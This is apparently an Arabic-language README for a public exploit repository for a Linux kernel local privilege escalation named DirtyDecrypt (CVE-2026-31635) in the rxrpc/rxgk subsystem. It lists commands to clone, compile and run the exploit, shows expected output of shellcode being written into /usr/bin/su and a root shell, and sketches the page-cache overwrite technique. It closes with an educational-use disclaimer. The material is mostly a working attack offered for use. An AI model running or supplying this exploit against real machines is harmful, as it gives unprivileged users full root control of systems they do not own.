
CVE-2026-31635
تصعيد الامتيازات محليًا في نواة لينكس عبر إفساد ذاكرة التخزين المؤقت للصفحات في RXGK
DirtyDecrypt (CVE-2026-31635) هو ثغرة تصعيد امتيازات محلي في نظام rxrpc الفرعي للنواة (تحديدًا مكون rxgk).
يستغل عدم وجود فحص للنسخ عند الكتابة (COW) أثناء فك تشفير AES-CBC، مما يسمح لمستخدم غير متميز بإفساد ذاكرة التخزين المؤقت للصفحات وتحقيق كتابة عشوائية للملفات، مما يؤدي إلى الوصول للجذر.
/etc/passwd (كلمة مرور الجذر فارغة)CONFIG_RXGK=y)CONFIG_RXGK=nCONFIG_RXGKAF_RXRPCkeyctl (لمفاتيح rxrpc)git clone https://github.com/0xBlackash/DirtyDecrypt.git
cd DirtyDecrypt
gcc -O2 -static -pthread CVE-2026-31635.c -o DirtyDecrypt
sudo ./DirtyDecrypt
الخرج الناجح المتوقع:
=== rxgk pagecache write (DirtyDecrypt) ===
uid=1000 euid=1000
[*] writing shellcode to /usr/bin/su (96 bytes from offset 0)
[========================================] 100% (XXX/96, YYYY fires)
[*] XXX fires in Z.Zs
[*] exec /usr/bin/su
[*] restore: cp /tmp/.su_12345 /usr/bin/su
# whoami
root
# id
uid=0(root) gid=0(root) groups=0(root)
#
DirtyDecrypt/
├── CVE-2026-31635.c # الاستغلال الرئيسي
├── README.md # هذا الملف
├── Makefile # اختياري
└── exploit.log # سجل الخرج الاختياري
AF_RXRPC + splice() لإجبار صفحات ذاكرة التخزين المؤقت على مسار فك تشفير RXGKskb_cow_data()/etc/passwd) بايتًا تلو الآخر باستخدام تقنية النافذة المنزلقةهذا الاستغلال مخصص للاختبارات الأمنية التعليمية والمصرح بها فقط.
الاستخدام غير المصرح به على أنظمة لا تملكها غير قانوني.
⭐ قم بتمييز هذا المستودع بنجمة إذا ساعدك!
صنع بـ ❤️ من أجل مجتمع الأبحاث